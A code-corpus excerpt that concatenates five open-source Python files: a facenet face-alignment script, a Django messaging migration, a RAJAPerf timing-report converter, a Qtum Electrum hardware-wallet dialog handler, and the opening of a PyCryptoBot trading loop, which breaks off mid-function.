output_filename_n = "{}_{}{}".format(filename_base, i, file_extension)
else:
output_filename_n = "{}{}".format(filename_base, file_extension)
misc.imsave(output_filename_n, scaled)
text_file.write('%s %d %d %d %d\n' % (output_filename_n, bb[0], bb[1], bb[2], bb[3]))
else:
print('Unable to align "%s"' % image_path)
text_file.write('%s\n' % (output_filename))
print('Total number of images: %d' % nrof_images_total)
print('Number of successfully aligned images: %d' % nrof_successfully_aligned)
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir', type=str, help='Directory with unaligned images.')
parser.add_argument('--output_dir', type=str, help='Directory with aligned face thumbnails.')
parser.add_argument('--image_size', type=int,
help='Image size (height, width) in pixels.', default=182)
parser.add_argument('--margin', type=int,
help='Margin for the crop around the bounding box (height, width) in pixels.', default=44)
parser.add_argument('--random_order',
help='Shuffles the order of images to enable alignment using multiple processes.', action='store_true')
parser.add_argument('--gpu_memory_fraction', type=float,
help='Upper bound on the amount of GPU memory that will be used by the process.', default=1.0)
parser.add_argument('--detect_multiple_faces', type=bool,
help='Detect and align multiple faces per image.', default=False)
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
| 51.8875 | 133 | 0.57456 | [
"MIT"
] | btlk/facenet | facenet/align/align_dataset_mtcnn.py | 8,302 | Python |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'MessageContact'
db.create_table('umessages_messagecontact', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('from_user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='from_users', to=orm['auth.User'])),
('to_user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='to_users', to=orm['auth.User'])),
('latest_message', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['umessages.Message'])),
))
db.send_create_signal('umessages', ['MessageContact'])
# Adding unique constraint on 'MessageContact', fields ['from_user', 'to_user']
db.create_unique('umessages_messagecontact', ['from_user_id', 'to_user_id'])
# Adding model 'MessageRecipient'
db.create_table('umessages_messagerecipient', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('message', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['umessages.Message'])),
('read_at', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('deleted_at', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal('umessages', ['MessageRecipient'])
# Adding model 'Message'
db.create_table('umessages_message', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('body', self.gf('django.db.models.fields.TextField')()),
('sender', self.gf('django.db.models.fields.related.ForeignKey')(related_name='sent_messages', to=orm['auth.User'])),
('sent_at', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('sender_deleted_at', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal('umessages', ['Message'])
def backwards(self, orm):
# Removing unique constraint on 'MessageContact', fields ['from_user', 'to_user']
db.delete_unique('umessages_messagecontact', ['from_user_id', 'to_user_id'])
# Deleting model 'MessageContact'
db.delete_table('umessages_messagecontact')
# Deleting model 'MessageRecipient'
db.delete_table('umessages_messagerecipient')
# Deleting model 'Message'
db.delete_table('umessages_message')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'umessages.message': {
'Meta': {'ordering': "['-sent_at']", 'object_name': 'Message'},
'body': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recipients': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'received_messages'", 'symmetrical': 'False', 'through': "orm['umessages.MessageRecipient']", 'to': "orm['auth.User']"}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sent_messages'", 'to': "orm['auth.User']"}),
'sender_deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'sent_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'umessages.messagecontact': {
'Meta': {'ordering': "['latest_message']", 'unique_together': "(('from_user', 'to_user'),)", 'object_name': 'MessageContact'},
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_users'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latest_message': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['umessages.Message']"}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_users'", 'to': "orm['auth.User']"})
},
'umessages.messagerecipient': {
'Meta': {'object_name': 'MessageRecipient'},
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['umessages.Message']"}),
'read_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['umessages']
| 65.691057 | 221 | 0.593936 | [
"BSD-3-Clause"
] | SkyTruth/django-userena | userena/contrib/umessages/migrations/0001_initial.py | 8,080 | Python |
#!/bin/env python
import csv
from datetime import datetime
import os
import xml.etree.ElementTree as ET
import xml
# https://stackabuse.com/reading-and-writing-xml-files-in-python/
# xmlformatter:
# https://www.freeformatter.com/xml-formatter.html#ad-output
infile = "./RAJAPerf-timing.csv"
def read_infile(infile):
"""STUB"""
with open(infile) as csvfile:
rps_reader = csv.reader(csvfile, delimiter=',')
def get_date():
"""STUB"""
date = datetime.now().strftime("%-Y-%m-%dT%H:%M:%S")
return date
date = get_date()
perf_report = ET.Element("performance-report")
name ="RAJAPerf" + date + ".xml"
time_units="seconds"
perf_report.set("date", date)
perf_report.set("name", name)
perf_report.set("time-units", time_units)
perf_root = ET.SubElement(perf_report, 'timing')
perf_root.set("end-time",date)
perf_root.set("name", "kokkos_perf_suite")
#print(ET.tostring(perf_report))
# b'<performance-report time-units="seconds" date="2020-12-16T14:34:40"
# name="RAJAPerf-timing.csv"><timing end-time="2020-12-16T14:34:40"
# name="kokkos_perf_suite" /></performance-report>'
# metadata TBD
# create hierarchy
test_suite_list = []
with open(infile) as csvfile:
rps_reader = csv.reader(csvfile, delimiter=',')
for row in rps_reader:
test_suite_list.append(row)
suite_names_set = set([x[0][:x[0].find("_")] for x in test_suite_list[2:]])
#suite_names_set
#Out[135]: {'Basic', 'KokkosMechanics'}
heirarch_dict = dict()
for name in suite_names_set:
heirarch_dict[name] = []
# heirarch_dict
# Out[137]: {'KokkosMechanics': [], 'Basic': []}
for item in test_suite_list[2:]:
key = item[0][:item[0].find("_")]
heirarch_dict[key].append(item)
#print(item)
#NEXT STEPS: For the main test categories, Basic and KokkosMechanics, sum
# the test times over all of the kernels for each of their variants
col_meanings_dict = dict()
for index, item in enumerate(test_suite_list[1]):
#print(index, item)
col_meanings_dict[index] = item
#col_meanings_dict
# Out[152]:
# {0: 'Kernel ',
# 1: ' Base_Seq ',
# 2: ' Lambda_Seq ',
# 3: ' RAJA_Seq ',
# 4: ' Base_CUDA ',
# 5: ' RAJA_CUDA ',
# 6: ' Kokkos_Lambda_Seq ',
# 7: ' Kokkos_Functor_Seq ',
# 8: ' Kokkos_Lambda_CUDA ',
# 9: ' Kokkos_Functor_CUDA'}
def associate_timings_with_xml(xml_element, timing_dict, suite_or_test_name):
"""STUB -- xml_element will be an element of perf_report;
timing_dict = a map of variant names to test run times
"""
for key, value in timing_dict.items():
xml_element.set(key.lower(), str(value))
xml_element.set("name", suite_or_test_name.strip())
def create_RPS_xml_report(suite_name, suite_data_list):
"""STUB - suite_name is a string = Basic, KokkosMechanics, etc.;
suite_data_list will be the values for a key, Basic or KokkosMechanics
"""
aggregate_results_dict = dict()
#print(suite_data_list)
for list_item in suite_data_list:
for index, timing in enumerate(list_item[1:]):
if "Not run" in timing:
continue
variant_name = col_meanings_dict[index + 1]
if variant_name not in aggregate_results_dict:
aggregate_results_dict[variant_name] = 0.0
# sums values of all the basic kernels
aggregate_results_dict[variant_name] += float(timing)
#print(aggregate_results_dict)
suite_root = ET.SubElement(perf_root, "timing")
associate_timings_with_xml(suite_root, aggregate_results_dict, suite_name)
for list_item in suite_data_list:
test_timings_dict = dict()
for index, timing in enumerate(list_item[1:]):
if "Not run" in timing:
continue
variant_name = col_meanings_dict[index + 1]
test_timings_dict[variant_name] = float(timing)
xml_element_for_a_kernel_test = ET.SubElement(suite_root, "timing")
associate_timings_with_xml(xml_element_for_a_kernel_test,
test_timings_dict, list_item[0])
def run():
"""STUB"""
read_infile(infile)
#create_RPS_xml_report("Basic", heirarch_dict["Basic"])
for key in heirarch_dict.keys():
create_RPS_xml_report(key, heirarch_dict[key])
# Aided in debugging
#print(heirarch_dict["KokkosMechanics"])
# Prints xml to screen as string
#print(ET.tostring(perf_report))
ET.dump(perf_report)
if __name__ == "__main__":
run()
| 25.563218 | 78 | 0.678507 | [
"BSD-3-Clause"
] | CRobeck/RAJAPerf | scripts/csv_xml.py | 4,448 | Python |
#!/usr/bin/env python2
# -*- mode: python -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2016 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
from PyQt5.QtWidgets import QVBoxLayout, QLabel
from qtum_electrum.gui.qt.password_dialog import PasswordLayout, PW_PASSPHRASE
from qtum_electrum.gui.qt.util import *
from qtum_electrum.i18n import _
from qtum_electrum.util import PrintError
# The trickiest thing about this handler was getting windows properly
# parented on MacOSX.
class QtHandlerBase(QObject, PrintError):
'''An interface between the GUI (here, QT) and the device handling
logic for handling I/O.'''
passphrase_signal = pyqtSignal(object, object)
message_signal = pyqtSignal(object, object)
error_signal = pyqtSignal(object, object)
word_signal = pyqtSignal(object)
clear_signal = pyqtSignal()
query_signal = pyqtSignal(object, object)
yes_no_signal = pyqtSignal(object)
status_signal = pyqtSignal(object)
def __init__(self, win, device):
super(QtHandlerBase, self).__init__()
self.clear_signal.connect(self.clear_dialog)
self.error_signal.connect(self.error_dialog)
self.message_signal.connect(self.message_dialog)
self.passphrase_signal.connect(self.passphrase_dialog)
self.word_signal.connect(self.word_dialog)
self.query_signal.connect(self.win_query_choice)
self.yes_no_signal.connect(self.win_yes_no_question)
self.status_signal.connect(self._update_status)
self.win = win
self.device = device
self.dialog = None
self.done = threading.Event()
def top_level_window(self):
return self.win.top_level_window()
def update_status(self, paired):
self.status_signal.emit(paired)
def _update_status(self, paired):
if hasattr(self, 'button'):
button = self.button
icon_name = button.icon_paired if paired else button.icon_unpaired
button.setIcon(read_QIcon(icon_name))
def query_choice(self, msg, labels):
self.done.clear()
self.query_signal.emit(msg, labels)
self.done.wait()
return self.choice
def yes_no_question(self, msg):
self.done.clear()
self.yes_no_signal.emit(msg)
self.done.wait()
return self.ok
def show_message(self, msg, on_cancel=None):
self.message_signal.emit(msg, on_cancel)
def show_error(self, msg, blocking=False):
self.done.clear()
self.error_signal.emit(msg, blocking)
if blocking:
self.done.wait()
def finished(self):
self.clear_signal.emit()
def get_word(self, msg):
self.done.clear()
self.word_signal.emit(msg)
self.done.wait()
return self.word
def get_passphrase(self, msg, confirm):
self.done.clear()
self.passphrase_signal.emit(msg, confirm)
self.done.wait()
return self.passphrase
def passphrase_dialog(self, msg, confirm):
# If confirm is true, require the user to enter the passphrase twice
parent = self.top_level_window()
d = WindowModalDialog(parent, _("Enter Passphrase"))
if confirm:
OK_button = OkButton(d)
playout = PasswordLayout(msg=msg, kind=PW_PASSPHRASE, OK_button=OK_button)
vbox = QVBoxLayout()
vbox.addLayout(playout.layout())
vbox.addLayout(Buttons(CancelButton(d), OK_button))
d.setLayout(vbox)
passphrase = playout.new_password() if d.exec_() else None
else:
pw = QLineEdit()
pw.setEchoMode(2)
pw.setMinimumWidth(200)
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(msg))
vbox.addWidget(pw)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
d.setLayout(vbox)
passphrase = pw.text() if d.exec_() else None
self.passphrase = passphrase
self.done.set()
def word_dialog(self, msg):
dialog = WindowModalDialog(self.top_level_window(), "")
hbox = QHBoxLayout(dialog)
hbox.addWidget(QLabel(msg))
text = QLineEdit()
text.setMaximumWidth(100)
text.returnPressed.connect(dialog.accept)
hbox.addWidget(text)
hbox.addStretch(1)
dialog.exec_() # Firmware cannot handle cancellation
self.word = text.text()
self.done.set()
def message_dialog(self, msg, on_cancel):
# Called more than once during signing, to confirm output and fee
self.clear_dialog()
title = _('Please check your %s device') % self.device
self.dialog = dialog = WindowModalDialog(self.top_level_window(), title)
l = QLabel(msg)
vbox = QVBoxLayout(dialog)
vbox.addWidget(l)
if on_cancel:
dialog.rejected.connect(on_cancel)
vbox.addLayout(Buttons(CancelButton(dialog)))
dialog.show()
def error_dialog(self, msg, blocking):
self.win.show_error(msg, parent=self.top_level_window())
if blocking:
self.done.set()
def clear_dialog(self):
if self.dialog:
self.dialog.accept()
self.dialog = None
def win_query_choice(self, msg, labels):
self.choice = self.win.query_choice(msg, labels)
self.done.set()
def win_yes_no_question(self, msg):
self.ok = self.win.question(msg)
self.done.set()
from qtum_electrum.plugin import hook
from qtum_electrum.util import UserCancelled
from qtum_electrum.gui.qt.main_window import StatusBarButton
class QtPluginBase(object):
@hook
def load_wallet(self, wallet, window):
for keystore in wallet.get_keystores():
if not isinstance(keystore, self.keystore_class):
continue
if not self.libraries_available:
message = keystore.plugin.get_library_not_available_message()
window.show_error(message)
return
tooltip = self.device + '\n' + (keystore.label or 'unnamed')
cb = partial(self.show_settings_dialog, window, keystore)
button = StatusBarButton(QIcon(self.icon_unpaired), tooltip, cb)
button.icon_paired = self.icon_paired
button.icon_unpaired = self.icon_unpaired
window.statusBar().addPermanentWidget(button)
handler = self.create_handler(window)
handler.button = button
keystore.handler = handler
keystore.thread = TaskThread(window, window.on_error)
self.add_show_address_on_hw_device_button_for_receive_addr(wallet, keystore, window)
# Trigger a pairing
keystore.thread.add(partial(self.get_client, keystore))
def choose_device(self, window, keystore):
'''This dialog box should be usable even if the user has
forgotten their PIN or it is in bootloader mode.'''
device_id = self.device_manager().xpub_id(keystore.xpub)
if not device_id:
try:
info = self.device_manager().select_device(self, keystore.handler, keystore)
except UserCancelled:
return
device_id = info.device.id_
return device_id
def show_settings_dialog(self, window, keystore):
device_id = self.choose_device(window, keystore)
def add_show_address_on_hw_device_button_for_receive_addr(self, wallet, keystore, main_window):
plugin = keystore.plugin
receive_address_e = main_window.receive_address_e
def show_address():
addr = receive_address_e.text()
keystore.thread.add(partial(plugin.show_address, wallet, addr, keystore))
receive_address_e.addButton("eye1.png", show_address, _("Show on {}").format(plugin.device))
| 37.90678 | 100 | 0.666331 | [
"MIT"
] | mikehash/qtum-electrum | qtum_electrum/plugins/hw_wallet/qt.py | 8,946 | Python |
"""Python Crypto Bot consuming Coinbase Pro or Binance APIs"""
import functools
import os
import sched
import sys
import time
import pandas as pd
from datetime import datetime
from models.PyCryptoBot import PyCryptoBot, truncate as _truncate
from models.AppState import AppState
from models.Trading import TechnicalAnalysis
from models.TradingAccount import TradingAccount
from models.helper.MarginHelper import calculate_margin
from views.TradingGraphs import TradingGraphs
from models.Strategy import Strategy
from models.helper.LogHelper import Logger
# minimal traceback
sys.tracebacklimit = 1
app = PyCryptoBot()
account = TradingAccount(app)
technical_analysis = None
state = AppState(app, account)
state.initLastAction()
s = sched.scheduler(time.time, time.sleep)
def executeJob(sc=None, app: PyCryptoBot=None, state: AppState=None, trading_data=pd.DataFrame()):
"""Trading bot job which runs at a scheduled interval"""
global technical_analysis
# connectivity check (only when running live)
if app.isLive() and app.getTime() is None:
Logger.warning('Your connection to the exchange has gone down, will retry in 1 minute!')
# poll every 5 minute
list(map(s.cancel, s.queue))
s.enter(300, 1, executeJob, (sc, app, state))
return
# increment state.iterations
state.iterations = state.iterations + 1
if not app.isSimulation():
# retrieve the app.getMarket() data
trading_data = app.getHistoricalData(app.getMarket(), app.getGranularity())
else:
if len(trading_data) == 0:
return None
# analyse the market data
if app.isSimulation() and len(trading_data.columns) > 8:
df = trading_data
else:
trading_dataCopy = trading_data.copy()
technical_analysis = TechnicalAnalysis(trading_dataCopy)
technical_analysis.addAll()
df = technical_analysis.getDataFrame()
if app.isSimulation():
df_last = app.getInterval(df, state.iterations)
else:
df_last = app.getInterval(df)
if len(df_last.index.format()) > 0:
current_df_index = str(df_last.index.format()[0])
else:
current_df_index = state.last_df_index
formatted_current_df_index = f'{current_df_index} 00:00:00' if len(current_df_index) == 10 else current_df_index
if app.getSmartSwitch() == 1 and app.getGranularity() == 3600 and app.is1hEMA1226Bull() is True and app.is6hEMA1226Bull() is True:
Logger.info('*** smart switch from granularity 3600 (1 hour) to 900 (15 min) ***')
app.notifyTelegram(app.getMarket() + " smart switch from granularity 3600 (1 hour) to 900 (15 min)")
app.setGranularity(900)
list(map(s.cancel, s.queue))
s.enter(5, 1, executeJob, (sc, app, state))
if app.getSmartSwitch() == 1 and app.getGranularity() == 900 and app.is1hEMA1226Bull() is False and app.is6hEMA1226Bull() is False:
Logger.info("*** smart switch from granularity 900 (15 min) to 3600 (1 hour) ***")
app.notifyTelegram(app.getMarket() + " smart switch from granularity 900 (15 min) to 3600 (1 hour)")
app.setGranularity(3600)
list(map(s.cancel, s.queue))
s.enter(5, 1, executeJob, (sc, app, state))
if app.getExchange() == 'binance' and app.getGranularity() == 86400:
if len(df) < 250:
# data frame should have 250 rows, if not retry
Logger.error('error: data frame length is < 250 (' + str(len(df)) + ')')
list(map(s.cancel, s.queue))
s.enter(300, 1, executeJob, (sc, app, state))
else:
if len(df) < 300:
if not app.isSimulation():
# data frame should have 300 rows, if not retry
Logger.error('error: data frame length is < 300 (' + str(len(df)) + ')')
list(map(s.cancel, s.queue))
s.enter(300, 1, executeJob, (sc, app, state))
if len(df_last) > 0:
now = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
if not app.isSimulation():
ticker = app.getTicker(app.getMarket())
now = ticker[0]
price = ticker[1]
if price < df_last['low'].values[0] or price == 0:
price = float(df_last['close'].values[0])
else:
price = float(df_last['close'].values[0])
if price < 0.0001:
raise Exception(app.getMarket() + ' is unsuitable for trading, quote price is less than 0.0001!')
# technical indicators
ema12gtema26 = bool(df_last['ema12gtema26'].values[0])
ema12gtema26co = bool(df_last['ema12gtema26co'].values[0])
goldencross = bool(df_last['goldencross'].values[0])
macdgtsignal = bool(df_last['macdgtsignal'].values[0])
macdgtsignalco = bool(df_last['macdgtsignalco'].values[0])
ema12ltema26 = bool(df_last['ema12ltema26'].values[0])
ema12ltema26co = bool(df_last['ema12ltema26co'].values[0])
macdltsignal = bool(df_last['macdltsignal'].values[0])
macdltsignalco = bool(df_last['macdltsignalco'].values[0])
obv = float(df_last['obv'].values[0])
obv_pc = float(df_last['obv_pc'].values[0])
elder_ray_buy = bool(df_last['eri_buy'].values[0])
elder_ray_sell = bool(df_last['eri_sell'].values[0])
# if simulation interations < 200 set goldencross to true
if app.isSimulation() and state.iterations < 200:
goldencross = True
# candlestick detection
hammer = bool(df_last['hammer'].values[0])
inverted_hammer = bool(df_last['inverted_hammer'].values[0])
hanging_man = bool(df_last['hanging_man'].values[0])
shooting_star = bool(df_last['shooting_star'].values[0])
three_white_soldiers = bool(df_last['three_white_soldiers'].values[0])
three_black_crows = bool(df_last['three_black_crows'].values[0])
morning_star = bool(df_last['morning_star'].values[0])
evening_star = bool(df_last['evening_star'].values[0])
three_line_strike = bool(df_last['three_line_strike'].values[0])
abandoned_baby = bool(df_last['abandoned_baby'].values[0])
morning_doji_star = bool(df_last['morning_doji_star'].values[0])
evening_doji_star = bool(df_last['evening_doji_star'].values[0])
two_black_gapping = bool(df_last['two_black_gapping'].values[0])
strategy = Strategy(app, state, df, state.iterations)
state.action = strategy.getAction()
immediate_action = False
margin, profit, sell_fee = 0, 0, 0
if state.last_buy_size > 0 and state.last_buy_price > 0 and price > 0 and state.last_action == 'BUY':
# update last buy high
if price > state.last_buy_high:
state.last_buy_high = price
if state.last_buy_high > 0:
change_pcnt_high = ((price / state.last_buy_high) - 1) * 100
else:
change_pcnt_high = 0
# buy and sell calculations
state.last_buy_fee = round(state.last_buy_size * app.getTakerFee(), 8)
state.last_buy_filled = round(((state.last_buy_size - state.last_buy_fee) / state.last_buy_price), 8)
# if not a simulation, sync with exchange orders
if not app.isSimulation():
exchange_last_buy = app.getLastBuy()
if exchange_last_buy is not None:
if state.last_buy_size != exchange_last_buy['size']:
state.last_buy_size = exchange_last_buy['size']
if state.last_buy_filled != exchange_last_buy['filled']:
state.last_buy_filled = exchange_last_buy['filled']
if state.last_buy_price != exchange_last_buy['price']:
state.last_buy_price = exchange_last_buy['price']
if app.getExchange() == 'coinbasepro':
if state.last_buy_fee != exchange_last_buy['fee']:
state.last_buy_fee = exchange_last_buy['fee']
margin, profit, sell_fee = calculate_margin(
buy_size=state.last_buy_size,
buy_filled=state.last_buy_filled,
buy_price=state.last_buy_price,
buy_fee=state.last_buy_fee,
sell_percent=app.getSellPercent(),
sell_price=price,
sell_taker_fee=app.getTakerFee())
# handle immedate sell actions
if strategy.isSellTrigger(price, technical_analysis.getTradeExit(price), margin, change_pcnt_high, obv_pc, macdltsignal):
state.action = 'SELL'
state.last_action = 'BUY'
immediate_action = True
# handle overriding wait actions (do not sell if sell at loss disabled!)
if strategy.isWaitTrigger(margin):
state.action = 'WAIT'
state.last_action = 'BUY'
immediate_action = False
bullbeartext = ''
if app.disableBullOnly() is True or (df_last['sma50'].values[0] == df_last['sma200'].values[0]):
bullbeartext = ''
elif goldencross is True:
bullbeartext = ' (BULL)'
elif goldencross is False:
bullbeartext = ' (BEAR)'
# polling is every 5 minutes (even for hourly intervals), but only process once per interval
if (immediate_action is True or state.last_df_index != current_df_index):
precision = 4
if (price < 0.01):
precision = 8
# Since precision does not change after this point, it is safe to prepare a tailored `truncate()` that would
# work with this precision. It should save a couple of `precision` uses, one for each `truncate()` call.
truncate = functools.partial(_truncate, n=precision)
price_text = 'Close: ' + truncate(price)
ema_text = app.compare(df_last['ema12'].values[0], df_last['ema26'].values[0], 'EMA12/26', precision)
macd_text = ''
if app.disableBuyMACD() is False:
macd_text = app.compare(df_last['macd'].values[0], df_last['signal'].values[0], 'MACD', precision)
obv_text = ''
if app.disableBuyOBV() is False:
obv_text = 'OBV: ' + truncate(df_last['obv'].values[0]) + ' (' + str(
truncate(df_last['obv_pc'].values[0])) + '%)'
state.eri_text = ''
if app.disableBuyElderRay() is False:
if elder_ray_buy is True:
state.eri_text = 'ERI: buy | '
elif elder_ray_sell is True:
state.eri_text = 'ERI: sell | '
else:
state.eri_text = 'ERI: | '
if hammer is True:
log_text = '* Candlestick Detected: Hammer ("Weak - Reversal - Bullish Signal - Up")'
Logger.info(log_text)
if shooting_star is True:
log_text = '* Candlestick Detected: Shooting Star ("Weak - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
if hanging_man is True:
log_text = '* Candlestick Detected: Hanging Man ("Weak - Continuation - Bearish Pattern - Down")'
Logger.info(log_text)
if inverted_hammer is True:
log_text = '* Candlestick Detected: Inverted Hammer ("Weak - Continuation - Bullish Pattern - Up")'
Logger.info(log_text)
if three_white_soldiers is True:
log_text = '*** Candlestick Detected: Three White Soldiers ("Strong - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if three_black_crows is True:
log_text = '* Candlestick Detected: Three Black Crows ("Strong - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if morning_star is True:
log_text = '*** Candlestick Detected: Morning Star ("Strong - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if evening_star is True:
log_text = '*** Candlestick Detected: Evening Star ("Strong - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if three_line_strike is True:
log_text = '** Candlestick Detected: Three Line Strike ("Reliable - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if abandoned_baby is True:
log_text = '** Candlestick Detected: Abandoned Baby ("Reliable - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if morning_doji_star is True:
log_text = '** Candlestick Detected: Morning Doji Star ("Reliable - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if evening_doji_star is True:
log_text = '** Candlestick Detected: Evening Doji Star ("Reliable - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if two_black_gapping is True:
log_text = '*** Candlestick Detected: Two Black Gapping ("Reliable - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
ema_co_prefix = ''
ema_co_suffix = ''
if ema12gtema26co is True:
ema_co_prefix = '*^ '
ema_co_suffix = ' ^*'
elif ema12ltema26co is True:
ema_co_prefix = '*v '
ema_co_suffix = ' v*'
elif ema12gtema26 is True:
ema_co_prefix = '^ '
ema_co_suffix = ' ^'
elif ema12ltema26 is True:
ema_co_prefix = 'v '
ema_co_suffix = ' v'
macd_co_prefix = ''
macd_co_suffix = ''
if app.disableBuyMACD() is False:
if macdgtsignalco is True:
macd_co_prefix = '*^ '
macd_co_suffix = ' ^*'
elif macdltsignalco is True:
macd_co_prefix = '*v '
macd_co_suffix = ' v*'
elif macdgtsignal is True:
macd_co_prefix = '^ '
macd_co_suffix = ' ^'
elif macdltsignal is True:
macd_co_prefix = 'v '
macd_co_suffix = ' v'
obv_prefix = ''
obv_suffix = ''
if app.disableBuyOBV() is False:
if float(obv_pc) > 0:
obv_prefix = '^ '
obv_suffix = ' ^ | '
elif float(obv_pc) < 0:
